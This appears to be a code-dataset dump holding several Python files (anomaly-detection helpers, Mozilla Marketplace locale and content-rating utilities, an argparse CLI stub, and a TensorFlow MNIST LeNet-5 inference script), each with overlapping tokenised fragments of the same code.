"j) < len(smoothed_errors) and (i + j) not in anomaly_indices: if (i +",
"num_windows = int((len(y_true) - (batch_size * window_size)) / batch_size) anomalies_indices = [] for",
"- j) not in above_epsilon and (i - j) >= 0: above_epsilon.append(i -",
"around the mean mu = np.mean(window_smoothed_errors) smoothed_errors_inv = [mu + (mu - e)",
"range(e_seq[0], e_seq[1]) ]) anomalies_scores.append(score) return anomaly_sequences, anomalies_scores def compute_threshold(smoothed_errors, error_buffer, sd_limit=12.0): \"\"\"Helper method",
"window, all_anomalies ) if len(errors_seq) > 0: anomaly_indices = prune_anomalies( errors_seq, smoothed_errors, max_error_below_e,",
"was done in the implementation of NASA paper but # wasn't referenced in",
"in range(len(smoothed_errors_max)): if i < len(smoothed_errors_max) - 1: delta = smoothed_errors_max[i] - smoothed_errors_max[i",
"error_buffer): \"\"\" Helper method to get anomalies. \"\"\" mu = np.mean(smoothed_errors) sigma ="
] |
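# End-to-end sketch on synthetic data (all values illustrative, not
# from the source). extract_anomalies requires
# len(y_true) > batch_size * window_size (150 points with the defaults
# above), so 400 points are used here.
#
#     import numpy as np
#
#     rng = np.random.RandomState(42)
#     series = list(np.sin(np.linspace(0, 20, 400)))
#     forecast = [v + rng.normal(0, 0.05) for v in series]
#     forecast[200] += 3.0   # inject one large forecast miss
#
#     errors = get_forecast_errors(forecast, series)
#     sequences, scores = extract_anomalies(series, errors, window_size=5,
#                                           batch_size=30, error_buffer=5)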
# -*- coding: utf-8 -*-
from collections import defaultdict

import commonware.log

from amo.utils import find_language

import mkt

log = commonware.log.getLogger('z.webapps')


def get_locale_properties(manifest, property, default_locale=None):
    locale_dict = {}
    for locale in manifest.get('locales', {}):
        if property in manifest['locales'][locale]:
            locale_dict[locale] = manifest['locales'][locale][property]

    # Add in the default locale name.
    default = manifest.get('default_locale') or default_locale
    root_property = manifest.get(property)
    if default and root_property:
        locale_dict[default] = root_property

    return locale_dict


def get_supported_locales(manifest):
    """
    Returns a list of locales found in the "locales" property of the
    manifest.

    This will convert locales found in the SHORTER_LANGUAGES setting to
    their full locale. It will also remove locales not found in
    AMO_LANGUAGES.

    Note: The default_locale is not included.
    """
    return sorted(filter(None, map(find_language, set(
        manifest.get('locales', {}).keys()))))


def dehydrate_content_rating(rating):
    """
    {body.id, rating.id} to translated rating.label.
    """
    try:
        body = mkt.ratingsbodies.dehydrate_ratings_body(
            mkt.ratingsbodies.RATINGS_BODIES[int(rating['body'])])
    except TypeError:
        # Legacy ES format (bug 943371).
        return {}

    rating = mkt.ratingsbodies.dehydrate_rating(
        body.ratings[int(rating['rating'])])
    return rating.label


def dehydrate_content_ratings(content_ratings):
    """Dehydrate an object of content ratings from rating IDs to dict."""
    for body in content_ratings or {}:
        # Dehydrate all content ratings.
        content_ratings[body] = dehydrate_content_rating(content_ratings[body])
    return content_ratings


def dehydrate_descriptors(keys, body=None):
    """
    List of keys to lists of descriptor slugs by body.

    ['ESRB_BLOOD', ...] to {'esrb': ['blood'], ...}.
    """
    results = defaultdict(list)
    for key in keys:
        obj = mkt.ratingdescriptors.RATING_DESCS.get(key)
        if obj:
            # Slugify and remove body prefix.
            # NOTE: this shadows the `body` keyword argument.
            body, label = key.lower().replace('_', '-').split('-', 1)
            if label != 'no-descs':
                results[body].append(label)
    return dict(results)


def dehydrate_interactives(keys):
    """
    List of keys to list of interactive slugs.

    ['SOCIAL_NETWORKING', ...] to ['social-networking', ...].
    """
    results = []
    for key in keys:
        obj = mkt.ratinginteractives.RATING_INTERACTIVES.get(key)
        if obj:
            results.append(key.lower().replace('_', '-'))
    return results
"= {} for locale in manifest.get('locales', {}): if property in manifest['locales'][locale]: locale_dict[locale] =",
"map(find_language, set( manifest.get('locales', {}).keys())))) def dehydrate_content_rating(rating): \"\"\" {body.id, rating.id} to translated rating.label. \"\"\"",
"setting to their full locale. It will also remove locales not found in",
"in the SHORTER_LANGUAGES setting to their full locale. It will also remove locales",
"IDs to dict.\"\"\" for body in content_ratings or {}: # Dehydrate all content",
"collections import defaultdict import commonware.log from amo.utils import find_language import mkt log =",
"def dehydrate_content_rating(rating): \"\"\" {body.id, rating.id} to translated rating.label. \"\"\" try: body = mkt.ratingsbodies.dehydrate_ratings_body(",
"if label != 'no-descs': results[body].append(label) return dict(results) def dehydrate_interactives(keys): \"\"\" List of keys",
"keys to list of interactive slugs. ['SOCIAL_NETWORKING', ...] to ['social-networking', ...]. \"\"\" results",
"to dict.\"\"\" for body in content_ratings or {}: # Dehydrate all content ratings.",
"Add in the default locale name. default = manifest.get('default_locale') or default_locale root_property =",
"\"\"\" Returns a list of locales found in the \"locales\" property of the",
"is not included. \"\"\" return sorted(filter(None, map(find_language, set( manifest.get('locales', {}).keys())))) def dehydrate_content_rating(rating): \"\"\"",
"locale_dict[locale] = manifest['locales'][locale][property] # Add in the default locale name. default = manifest.get('default_locale')",
"['social-networking', ...]. \"\"\" results = [] for key in keys: obj = mkt.ratinginteractives.RATING_INTERACTIVES.get(key)",
"slugs by body. ['ESRB_BLOOD, ...] to {'esrb': ['blood'], ...}. \"\"\" results = defaultdict(list)",
"results[body].append(label) return dict(results) def dehydrate_interactives(keys): \"\"\" List of keys to list of interactive",
"manifest.get('locales', {}).keys())))) def dehydrate_content_rating(rating): \"\"\" {body.id, rating.id} to translated rating.label. \"\"\" try: body",
"to ['social-networking', ...]. \"\"\" results = [] for key in keys: obj =",
"content_ratings[body] = dehydrate_content_rating(content_ratings[body]) return content_ratings def dehydrate_descriptors(keys, body=None): \"\"\" List of keys to",
"manifest.get(property) if default and root_property: locale_dict[default] = root_property return locale_dict def get_supported_locales(manifest): \"\"\"",
"dehydrate_content_ratings(content_ratings): \"\"\"Dehydrate an object of content ratings from rating IDs to dict.\"\"\" for",
"found in the SHORTER_LANGUAGES setting to their full locale. It will also remove",
"rating.id} to translated rating.label. \"\"\" try: body = mkt.ratingsbodies.dehydrate_ratings_body( mkt.ratingsbodies.RATINGS_BODIES[int(rating['body'])]) except TypeError: #",
"TypeError: # Legacy ES format (bug 943371). return {} rating = mkt.ratingsbodies.dehydrate_rating( body.ratings[int(rating['rating'])])",
"obj = mkt.ratingdescriptors.RATING_DESCS.get(key) if obj: # Slugify and remove body prefix. body, label",
"rating IDs to dict.\"\"\" for body in content_ratings or {}: # Dehydrate all",
"return content_ratings def dehydrate_descriptors(keys, body=None): \"\"\" List of keys to lists of descriptor",
"lists of descriptor slugs by body. ['ESRB_BLOOD, ...] to {'esrb': ['blood'], ...}. \"\"\"",
"locale_dict def get_supported_locales(manifest): \"\"\" Returns a list of locales found in the \"locales\"",
"locale. It will also remove locales not found in AMO_LANGUAGES. Note: The default_locale",
"the manifest. This will convert locales found in the SHORTER_LANGUAGES setting to their",
"ES format (bug 943371). return {} rating = mkt.ratingsbodies.dehydrate_rating( body.ratings[int(rating['rating'])]) return rating.label def",
"dict(results) def dehydrate_interactives(keys): \"\"\" List of keys to list of interactive slugs. ['SOCIAL_NETWORKING',",
"[] for key in keys: obj = mkt.ratinginteractives.RATING_INTERACTIVES.get(key) if obj: results.append(key.lower().replace('_', '-')) return",
"locale name. default = manifest.get('default_locale') or default_locale root_property = manifest.get(property) if default and",
"not found in AMO_LANGUAGES. Note: The default_locale is not included. \"\"\" return sorted(filter(None,",
"\"\"\"Dehydrate an object of content ratings from rating IDs to dict.\"\"\" for body",
"= mkt.ratingsbodies.dehydrate_ratings_body( mkt.ratingsbodies.RATINGS_BODIES[int(rating['body'])]) except TypeError: # Legacy ES format (bug 943371). return {}",
"locales not found in AMO_LANGUAGES. Note: The default_locale is not included. \"\"\" return",
"a list of locales found in the \"locales\" property of the manifest. This",
"of interactive slugs. ['SOCIAL_NETWORKING', ...] to ['social-networking', ...]. \"\"\" results = [] for",
"property, default_locale=None): locale_dict = {} for locale in manifest.get('locales', {}): if property in",
"body=None): \"\"\" List of keys to lists of descriptor slugs by body. ['ESRB_BLOOD,",
"= manifest.get('default_locale') or default_locale root_property = manifest.get(property) if default and root_property: locale_dict[default] =",
"def dehydrate_descriptors(keys, body=None): \"\"\" List of keys to lists of descriptor slugs by",
"key.lower().replace('_', '-').split('-', 1) if label != 'no-descs': results[body].append(label) return dict(results) def dehydrate_interactives(keys): \"\"\"",
"rating = mkt.ratingsbodies.dehydrate_rating( body.ratings[int(rating['rating'])]) return rating.label def dehydrate_content_ratings(content_ratings): \"\"\"Dehydrate an object of content",
"root_property: locale_dict[default] = root_property return locale_dict def get_supported_locales(manifest): \"\"\" Returns a list of",
"\"\"\" results = defaultdict(list) for key in keys: obj = mkt.ratingdescriptors.RATING_DESCS.get(key) if obj:",
"to translated rating.label. \"\"\" try: body = mkt.ratingsbodies.dehydrate_ratings_body( mkt.ratingsbodies.RATINGS_BODIES[int(rating['body'])]) except TypeError: # Legacy",
"AMO_LANGUAGES. Note: The default_locale is not included. \"\"\" return sorted(filter(None, map(find_language, set( manifest.get('locales',",
"default = manifest.get('default_locale') or default_locale root_property = manifest.get(property) if default and root_property: locale_dict[default]",
"and root_property: locale_dict[default] = root_property return locale_dict def get_supported_locales(manifest): \"\"\" Returns a list",
"mkt.ratingsbodies.RATINGS_BODIES[int(rating['body'])]) except TypeError: # Legacy ES format (bug 943371). return {} rating =",
"def dehydrate_content_ratings(content_ratings): \"\"\"Dehydrate an object of content ratings from rating IDs to dict.\"\"\"",
"default_locale=None): locale_dict = {} for locale in manifest.get('locales', {}): if property in manifest['locales'][locale]:",
"default_locale root_property = manifest.get(property) if default and root_property: locale_dict[default] = root_property return locale_dict",
"commonware.log from amo.utils import find_language import mkt log = commonware.log.getLogger('z.webapps') def get_locale_properties(manifest, property,",
"locales found in the \"locales\" property of the manifest. This will convert locales",
"translated rating.label. \"\"\" try: body = mkt.ratingsbodies.dehydrate_ratings_body( mkt.ratingsbodies.RATINGS_BODIES[int(rating['body'])]) except TypeError: # Legacy ES",
"# Legacy ES format (bug 943371). return {} rating = mkt.ratingsbodies.dehydrate_rating( body.ratings[int(rating['rating'])]) return",
"list of interactive slugs. ['SOCIAL_NETWORKING', ...] to ['social-networking', ...]. \"\"\" results = []",
"= key.lower().replace('_', '-').split('-', 1) if label != 'no-descs': results[body].append(label) return dict(results) def dehydrate_interactives(keys):",
"dict.\"\"\" for body in content_ratings or {}: # Dehydrate all content ratings. content_ratings[body]",
"{}: # Dehydrate all content ratings. content_ratings[body] = dehydrate_content_rating(content_ratings[body]) return content_ratings def dehydrate_descriptors(keys,",
"body prefix. body, label = key.lower().replace('_', '-').split('-', 1) if label != 'no-descs': results[body].append(label)",
"in content_ratings or {}: # Dehydrate all content ratings. content_ratings[body] = dehydrate_content_rating(content_ratings[body]) return",
"default_locale is not included. \"\"\" return sorted(filter(None, map(find_language, set( manifest.get('locales', {}).keys())))) def dehydrate_content_rating(rating):",
"# Add in the default locale name. default = manifest.get('default_locale') or default_locale root_property",
"prefix. body, label = key.lower().replace('_', '-').split('-', 1) if label != 'no-descs': results[body].append(label) return",
"in manifest.get('locales', {}): if property in manifest['locales'][locale]: locale_dict[locale] = manifest['locales'][locale][property] # Add in",
"-*- from collections import defaultdict import commonware.log from amo.utils import find_language import mkt",
"also remove locales not found in AMO_LANGUAGES. Note: The default_locale is not included.",
"remove locales not found in AMO_LANGUAGES. Note: The default_locale is not included. \"\"\"",
"full locale. It will also remove locales not found in AMO_LANGUAGES. Note: The",
"not included. \"\"\" return sorted(filter(None, map(find_language, set( manifest.get('locales', {}).keys())))) def dehydrate_content_rating(rating): \"\"\" {body.id,",
"convert locales found in the SHORTER_LANGUAGES setting to their full locale. It will",
"mkt.ratingsbodies.dehydrate_ratings_body( mkt.ratingsbodies.RATINGS_BODIES[int(rating['body'])]) except TypeError: # Legacy ES format (bug 943371). return {} rating",
"by body. ['ESRB_BLOOD, ...] to {'esrb': ['blood'], ...}. \"\"\" results = defaultdict(list) for",
"rating.label. \"\"\" try: body = mkt.ratingsbodies.dehydrate_ratings_body( mkt.ratingsbodies.RATINGS_BODIES[int(rating['body'])]) except TypeError: # Legacy ES format",
"all content ratings. content_ratings[body] = dehydrate_content_rating(content_ratings[body]) return content_ratings def dehydrate_descriptors(keys, body=None): \"\"\" List",
"rating.label def dehydrate_content_ratings(content_ratings): \"\"\"Dehydrate an object of content ratings from rating IDs to",
"manifest.get('locales', {}): if property in manifest['locales'][locale]: locale_dict[locale] = manifest['locales'][locale][property] # Add in the",
"root_property = manifest.get(property) if default and root_property: locale_dict[default] = root_property return locale_dict def",
"root_property return locale_dict def get_supported_locales(manifest): \"\"\" Returns a list of locales found in",
"manifest.get('default_locale') or default_locale root_property = manifest.get(property) if default and root_property: locale_dict[default] = root_property",
"= commonware.log.getLogger('z.webapps') def get_locale_properties(manifest, property, default_locale=None): locale_dict = {} for locale in manifest.get('locales',",
"or {}: # Dehydrate all content ratings. content_ratings[body] = dehydrate_content_rating(content_ratings[body]) return content_ratings def",
"Note: The default_locale is not included. \"\"\" return sorted(filter(None, map(find_language, set( manifest.get('locales', {}).keys()))))",
"import mkt log = commonware.log.getLogger('z.webapps') def get_locale_properties(manifest, property, default_locale=None): locale_dict = {} for",
"found in the \"locales\" property of the manifest. This will convert locales found",
"It will also remove locales not found in AMO_LANGUAGES. Note: The default_locale is",
"...] to ['social-networking', ...]. \"\"\" results = [] for key in keys: obj",
"body. ['ESRB_BLOOD, ...] to {'esrb': ['blood'], ...}. \"\"\" results = defaultdict(list) for key",
"Slugify and remove body prefix. body, label = key.lower().replace('_', '-').split('-', 1) if label",
"of locales found in the \"locales\" property of the manifest. This will convert",
"for body in content_ratings or {}: # Dehydrate all content ratings. content_ratings[body] =",
"\"\"\" results = [] for key in keys: obj = mkt.ratinginteractives.RATING_INTERACTIVES.get(key) if obj:",
"for key in keys: obj = mkt.ratinginteractives.RATING_INTERACTIVES.get(key) if obj: results.append(key.lower().replace('_', '-')) return results",
"the default locale name. default = manifest.get('default_locale') or default_locale root_property = manifest.get(property) if",
"locale_dict[default] = root_property return locale_dict def get_supported_locales(manifest): \"\"\" Returns a list of locales"
] |
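The dehydrate_* helpers reassembled above are small, pure transforms over the mkt rating registries, so the slugification rule is easy to pin down in isolation. A minimal sketch, using a made-up stand-in for mkt.ratingdescriptors.RATING_DESCS (the real registry contents are not part of this excerpt):

# Stand-in registry; only key membership matters for the slug logic.
from collections import defaultdict

RATING_DESCS = {'ESRB_BLOOD': {}, 'PEGI_VIOLENCE': {}, 'ESRB_NO_DESCS': {}}

def dehydrate_descriptors(keys):
    results = defaultdict(list)
    for key in keys:
        if key in RATING_DESCS:
            # 'ESRB_BLOOD' -> 'esrb-blood' -> ('esrb', 'blood')
            body, label = key.lower().replace('_', '-').split('-', 1)
            if label != 'no-descs':
                results[body].append(label)
    return dict(results)

print(dehydrate_descriptors(['ESRB_BLOOD', 'PEGI_VIOLENCE', 'ESRB_NO_DESCS']))
# {'esrb': ['blood'], 'pegi': ['violence']}

Note the 'no-descs' filter: a body's explicit "no descriptors" marker contributes nothing to the result.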
[
"import argparse from modules import get, run def parser_hosts_options(parser): parser.add_argument(\"-g\", \"--group\", help=\"Get Hosts",
"argparse from modules import get, run def parser_hosts_options(parser): parser.add_argument(\"-g\", \"--group\", help=\"Get Hosts from",
"run def parser_hosts_options(parser): parser.add_argument(\"-g\", \"--group\", help=\"Get Hosts from Group\") parser.set_defaults(func=get.print_hosts) def parser_groups_options(parser): parser.add_argument(\"-g\",",
"<filename>modules/cli/getcli.py import argparse from modules import get, run def parser_hosts_options(parser): parser.add_argument(\"-g\", \"--group\", help=\"Get",
"def parser_hosts_options(parser): parser.add_argument(\"-g\", \"--group\", help=\"Get Hosts from Group\") parser.set_defaults(func=get.print_hosts) def parser_groups_options(parser): parser.add_argument(\"-g\", \"--group\",",
"parser_hosts_options(parser): parser.add_argument(\"-g\", \"--group\", help=\"Get Hosts from Group\") parser.set_defaults(func=get.print_hosts) def parser_groups_options(parser): parser.add_argument(\"-g\", \"--group\", help=\"Get",
"get, run def parser_hosts_options(parser): parser.add_argument(\"-g\", \"--group\", help=\"Get Hosts from Group\") parser.set_defaults(func=get.print_hosts) def parser_groups_options(parser):",
"parser.add_argument(\"-g\", \"--group\", help=\"Get Hosts from Group\") parser.set_defaults(func=get.print_hosts) def parser_groups_options(parser): parser.add_argument(\"-g\", \"--group\", help=\"Get Group",
"\"--group\", help=\"Get Hosts from Group\") parser.set_defaults(func=get.print_hosts) def parser_groups_options(parser): parser.add_argument(\"-g\", \"--group\", help=\"Get Group Info\")",
"help=\"Get Hosts from Group\") parser.set_defaults(func=get.print_hosts) def parser_groups_options(parser): parser.add_argument(\"-g\", \"--group\", help=\"Get Group Info\") parser.set_defaults(func=get.print_groups)",
"modules import get, run def parser_hosts_options(parser): parser.add_argument(\"-g\", \"--group\", help=\"Get Hosts from Group\") parser.set_defaults(func=get.print_hosts)",
"import get, run def parser_hosts_options(parser): parser.add_argument(\"-g\", \"--group\", help=\"Get Hosts from Group\") parser.set_defaults(func=get.print_hosts) def",
"from modules import get, run def parser_hosts_options(parser): parser.add_argument(\"-g\", \"--group\", help=\"Get Hosts from Group\")"
] |
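getcli.py only registers options and handlers via parser.set_defaults(func=...); the actual dispatch happens wherever the subcommands are assembled. A minimal sketch of that wiring, with a hypothetical "hosts" subcommand name and a stub handler standing in for get.print_hosts (neither is shown in the original module):

import argparse

def print_hosts(args):  # hypothetical stub for get.print_hosts
    print("hosts in group:", args.group)

def parser_hosts_options(parser):
    parser.add_argument("-g", "--group", help="Get Hosts from Group")
    parser.set_defaults(func=print_hosts)

parser = argparse.ArgumentParser(prog="getcli")
subparsers = parser.add_subparsers()
hosts = subparsers.add_parser("hosts")
parser_hosts_options(hosts)

args = parser.parse_args(["hosts", "-g", "web"])
args.func(args)  # set_defaults routes dispatch to print_hosts

The set_defaults(func=...) pattern keeps each subcommand's options and its handler registered in one place, so the top-level parser never needs a dispatch table.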
[] |
[
"# mnist_lenet5_forward.IMAGE_SIZE, # mnist_lenet5_forward.NUM_CHANNELS)) # accuracy_score = sess.run(accuracy, feed_dict={x:reshaped_x,y_:[2]}) prediction=tf.argmax(y_conv,1) predint=prediction.eval(feed_dict={x: reshaped_xs}, session=sess)",
"= tf.cast(image, tf.float32) y_conv = mnist_lenet5_forward.forward(x,False,None) #eva = mnist_lenet5_forward.forward([image],False,None) #prediction = tf.argmax(y,1) saver",
"ema = tf.train.ExponentialMovingAverage(mnist_lenet5_backward.MOVING_AVERAGE_DECAY) # ema_restore = ema.variables_to_restore() # saver = tf.train.Saver(ema_restore) # #",
"tf import matplotlib.pyplot as plt import mnist_lenet5_backward import mnist_lenet5_forward import numpy as np",
"= mnist_lenet5_forward.forward(x,False,None) #eva = mnist_lenet5_forward.forward([image],False,None) #prediction = tf.argmax(y,1) saver = tf.train.Saver() with tf.Session(graph=g)",
"mnist_lenet5_forward.forward([image],False,None) #prediction = tf.argmax(y,1) saver = tf.train.Saver() with tf.Session(graph=g) as sess: init_op =",
"tva = [(255-x)*1.0/255.0 for x in tv] #return np.asarray(im) return tva result=imageprepare() #x",
"mnist_lenet5_forward.IMAGE_SIZE, mnist_lenet5_forward.NUM_CHANNELS]) #x = tf.placeholder(tf.float32, [None, 784]) #ipt = imageprepare() #y_ = tf.placeholder(tf.float32,",
"= tf.placeholder(tf.float32, [None, mnist_lenet5_forward.OUTPUT_NODE]) # y = mnist_lenet5_forward.forward(x,False,None) # # ema = tf.train.ExponentialMovingAverage(mnist_lenet5_backward.MOVING_AVERAGE_DECAY)",
"saver.restore(sess, ckpt.model_checkpoint_path) reshaped_xs = np.reshape([result],( 1, mnist_lenet5_forward.IMAGE_SIZE, mnist_lenet5_forward.IMAGE_SIZE, mnist_lenet5_forward.NUM_CHANNELS)) # reshaped_x = np.reshape([ipt],(",
"Image, ImageFilter import tensorflow as tf import matplotlib.pyplot as plt import mnist_lenet5_backward import",
"# -*- coding: utf-8 -*- \"\"\" Created on Thu Nov 7 21:27:18 2019",
"= tf.equal(tf.argmax(y, 1), tf.argmax(y_, 1)) # accuracy = tf.reduce_mean(tf.cast(correct_prediction, tf.float32)) #image = tf.image.decode_png('D:/workspace/machine-learning/mnist/img/origin-2.png')",
"= mnist_lenet5_forward.forward([image],False,None) #prediction = tf.argmax(y,1) saver = tf.train.Saver() with tf.Session(graph=g) as sess: init_op",
"#y_ = tf.placeholder(tf.float32, [None, mnist_lenet5_forward.OUTPUT_NODE]) #y = mnist_lenet5_forward.forward(x,False,None) # x = tf.placeholder(tf.float32,[ #",
"@author: biyef \"\"\" from PIL import Image, ImageFilter import tensorflow as tf import",
"Thu Nov 7 21:27:18 2019 @author: biyef \"\"\" from PIL import Image, ImageFilter",
"tf.train.ExponentialMovingAverage(mnist_lenet5_backward.MOVING_AVERAGE_DECAY) # ema_restore = ema.variables_to_restore() # saver = tf.train.Saver(ema_restore) # # correct_prediction =",
"mnist_lenet5_forward.IMAGE_SIZE, # mnist_lenet5_forward.IMAGE_SIZE, # mnist_lenet5_forward.NUM_CHANNELS)) # accuracy_score = sess.run(accuracy, feed_dict={x:reshaped_x,y_:[2]}) prediction=tf.argmax(y_conv,1) predint=prediction.eval(feed_dict={x: reshaped_xs},",
"g: x = tf.placeholder(tf.float32,[1, mnist_lenet5_forward.IMAGE_SIZE, mnist_lenet5_forward.IMAGE_SIZE, mnist_lenet5_forward.NUM_CHANNELS]) #x = tf.placeholder(tf.float32, [None, 784]) #ipt",
"# x = tf.placeholder(tf.float32,[ # [ipt], # mnist_lenet5_forward.IMAGE_SIZE, # mnist_lenet5_forward.IMAGE_SIZE, # mnist_lenet5_forward.NUM_CHANNELS]) #",
"mnist_lenet5_forward.IMAGE_SIZE, mnist_lenet5_forward.IMAGE_SIZE, mnist_lenet5_forward.NUM_CHANNELS)) # reshaped_x = np.reshape([ipt],( # [ipt], # mnist_lenet5_forward.IMAGE_SIZE, # mnist_lenet5_forward.IMAGE_SIZE,",
"= tf.reduce_mean(tf.cast(correct_prediction, tf.float32)) #image = tf.image.decode_png('D:/workspace/machine-learning/mnist/img/origin-2.png') # image = tf.cast(image, tf.float32) y_conv =",
"# reshaped_x = np.reshape([ipt],( # [ipt], # mnist_lenet5_forward.IMAGE_SIZE, # mnist_lenet5_forward.IMAGE_SIZE, # mnist_lenet5_forward.NUM_CHANNELS)) #",
"import mnist_lenet5_forward import numpy as np def imageprepare(): im = Image.open('D:/workspace/machine-learning/mnist/img/origin-9.png') plt.imshow(im) plt.show()",
"mnist_lenet5_forward.NUM_CHANNELS]) #x = tf.placeholder(tf.float32, [None, 784]) #ipt = imageprepare() #y_ = tf.placeholder(tf.float32, [None,",
"mnist_lenet5_forward.forward(x,False,None) # x = tf.placeholder(tf.float32,[ # [ipt], # mnist_lenet5_forward.IMAGE_SIZE, # mnist_lenet5_forward.IMAGE_SIZE, # mnist_lenet5_forward.NUM_CHANNELS])",
"mnist_lenet5_forward.IMAGE_SIZE, # mnist_lenet5_forward.IMAGE_SIZE, # mnist_lenet5_forward.NUM_CHANNELS]) # y_ = tf.placeholder(tf.float32, [None, mnist_lenet5_forward.OUTPUT_NODE]) # y",
"# y = mnist_lenet5_forward.forward(x,False,None) # # ema = tf.train.ExponentialMovingAverage(mnist_lenet5_backward.MOVING_AVERAGE_DECAY) # ema_restore = ema.variables_to_restore()",
"[None, mnist_lenet5_forward.OUTPUT_NODE]) # y = mnist_lenet5_forward.forward(x,False,None) # # ema = tf.train.ExponentialMovingAverage(mnist_lenet5_backward.MOVING_AVERAGE_DECAY) # ema_restore",
"as sess: init_op = tf.global_variables_initializer() sess.run(init_op) ckpt = tf.train.get_checkpoint_state(mnist_lenet5_backward.MODEL_SAVE_PATH) saver.restore(sess, ckpt.model_checkpoint_path) reshaped_xs =",
"imageprepare(): im = Image.open('D:/workspace/machine-learning/mnist/img/origin-9.png') plt.imshow(im) plt.show() #print(type(im.getdata())) tv = list(im.getdata()) tva = [(255-x)*1.0/255.0",
"mnist_lenet5_forward.IMAGE_SIZE, # mnist_lenet5_forward.NUM_CHANNELS]) # y_ = tf.placeholder(tf.float32, [None, mnist_lenet5_forward.OUTPUT_NODE]) # y = mnist_lenet5_forward.forward(x,False,None)",
"= tf.argmax(y,1) saver = tf.train.Saver() with tf.Session(graph=g) as sess: init_op = tf.global_variables_initializer() sess.run(init_op)",
"np.reshape([ipt],( # [ipt], # mnist_lenet5_forward.IMAGE_SIZE, # mnist_lenet5_forward.IMAGE_SIZE, # mnist_lenet5_forward.NUM_CHANNELS)) # accuracy_score = sess.run(accuracy,",
"2019 @author: biyef \"\"\" from PIL import Image, ImageFilter import tensorflow as tf",
"= imageprepare() #y_ = tf.placeholder(tf.float32, [None, mnist_lenet5_forward.OUTPUT_NODE]) #y = mnist_lenet5_forward.forward(x,False,None) # x =",
"tf.image.decode_png('D:/workspace/machine-learning/mnist/img/origin-2.png') # image = tf.cast(image, tf.float32) y_conv = mnist_lenet5_forward.forward(x,False,None) #eva = mnist_lenet5_forward.forward([image],False,None) #prediction",
"biyef \"\"\" from PIL import Image, ImageFilter import tensorflow as tf import matplotlib.pyplot",
"1, mnist_lenet5_forward.IMAGE_SIZE, mnist_lenet5_forward.IMAGE_SIZE, mnist_lenet5_forward.NUM_CHANNELS)) # reshaped_x = np.reshape([ipt],( # [ipt], # mnist_lenet5_forward.IMAGE_SIZE, #",
"mnist_lenet5_forward.NUM_CHANNELS)) # reshaped_x = np.reshape([ipt],( # [ipt], # mnist_lenet5_forward.IMAGE_SIZE, # mnist_lenet5_forward.IMAGE_SIZE, # mnist_lenet5_forward.NUM_CHANNELS))",
"coding: utf-8 -*- \"\"\" Created on Thu Nov 7 21:27:18 2019 @author: biyef",
"tv] #return np.asarray(im) return tva result=imageprepare() #x = tf.placeholder(tf.float32, [None, 784]) #x =",
"-*- \"\"\" Created on Thu Nov 7 21:27:18 2019 @author: biyef \"\"\" from",
"tf.placeholder(tf.float32, [None, mnist_lenet5_forward.OUTPUT_NODE]) # y = mnist_lenet5_forward.forward(x,False,None) # # ema = tf.train.ExponentialMovingAverage(mnist_lenet5_backward.MOVING_AVERAGE_DECAY) #",
"tf.float32) y_conv = mnist_lenet5_forward.forward(x,False,None) #eva = mnist_lenet5_forward.forward([image],False,None) #prediction = tf.argmax(y,1) saver = tf.train.Saver()",
"= tf.placeholder(tf.float32, [None, 784]) #x = result with tf.Graph().as_default() as g: x =",
"#x = tf.placeholder(tf.float32, [None, 784]) #ipt = imageprepare() #y_ = tf.placeholder(tf.float32, [None, mnist_lenet5_forward.OUTPUT_NODE])",
"#y = mnist_lenet5_forward.forward(x,False,None) # x = tf.placeholder(tf.float32,[ # [ipt], # mnist_lenet5_forward.IMAGE_SIZE, # mnist_lenet5_forward.IMAGE_SIZE,",
"= tf.train.get_checkpoint_state(mnist_lenet5_backward.MODEL_SAVE_PATH) saver.restore(sess, ckpt.model_checkpoint_path) reshaped_xs = np.reshape([result],( 1, mnist_lenet5_forward.IMAGE_SIZE, mnist_lenet5_forward.IMAGE_SIZE, mnist_lenet5_forward.NUM_CHANNELS)) # reshaped_x",
"1)) # accuracy = tf.reduce_mean(tf.cast(correct_prediction, tf.float32)) #image = tf.image.decode_png('D:/workspace/machine-learning/mnist/img/origin-2.png') # image = tf.cast(image,",
"# mnist_lenet5_forward.IMAGE_SIZE, # mnist_lenet5_forward.NUM_CHANNELS]) # y_ = tf.placeholder(tf.float32, [None, mnist_lenet5_forward.OUTPUT_NODE]) # y =",
"in tv] #return np.asarray(im) return tva result=imageprepare() #x = tf.placeholder(tf.float32, [None, 784]) #x",
"plt.show() #print(type(im.getdata())) tv = list(im.getdata()) tva = [(255-x)*1.0/255.0 for x in tv] #return",
"as np def imageprepare(): im = Image.open('D:/workspace/machine-learning/mnist/img/origin-9.png') plt.imshow(im) plt.show() #print(type(im.getdata())) tv = list(im.getdata())",
"= tf.placeholder(tf.float32, [None, 784]) #ipt = imageprepare() #y_ = tf.placeholder(tf.float32, [None, mnist_lenet5_forward.OUTPUT_NODE]) #y",
"= ema.variables_to_restore() # saver = tf.train.Saver(ema_restore) # # correct_prediction = tf.equal(tf.argmax(y, 1), tf.argmax(y_,",
"[ipt], # mnist_lenet5_forward.IMAGE_SIZE, # mnist_lenet5_forward.IMAGE_SIZE, # mnist_lenet5_forward.NUM_CHANNELS)) # accuracy_score = sess.run(accuracy, feed_dict={x:reshaped_x,y_:[2]}) prediction=tf.argmax(y_conv,1)",
"tf.train.Saver() with tf.Session(graph=g) as sess: init_op = tf.global_variables_initializer() sess.run(init_op) ckpt = tf.train.get_checkpoint_state(mnist_lenet5_backward.MODEL_SAVE_PATH) saver.restore(sess,",
"numpy as np def imageprepare(): im = Image.open('D:/workspace/machine-learning/mnist/img/origin-9.png') plt.imshow(im) plt.show() #print(type(im.getdata())) tv =",
"tf.global_variables_initializer() sess.run(init_op) ckpt = tf.train.get_checkpoint_state(mnist_lenet5_backward.MODEL_SAVE_PATH) saver.restore(sess, ckpt.model_checkpoint_path) reshaped_xs = np.reshape([result],( 1, mnist_lenet5_forward.IMAGE_SIZE, mnist_lenet5_forward.IMAGE_SIZE,",
"plt import mnist_lenet5_backward import mnist_lenet5_forward import numpy as np def imageprepare(): im =",
"= result with tf.Graph().as_default() as g: x = tf.placeholder(tf.float32,[1, mnist_lenet5_forward.IMAGE_SIZE, mnist_lenet5_forward.IMAGE_SIZE, mnist_lenet5_forward.NUM_CHANNELS]) #x",
"[(255-x)*1.0/255.0 for x in tv] #return np.asarray(im) return tva result=imageprepare() #x = tf.placeholder(tf.float32,",
"# [ipt], # mnist_lenet5_forward.IMAGE_SIZE, # mnist_lenet5_forward.IMAGE_SIZE, # mnist_lenet5_forward.NUM_CHANNELS)) # accuracy_score = sess.run(accuracy, feed_dict={x:reshaped_x,y_:[2]})",
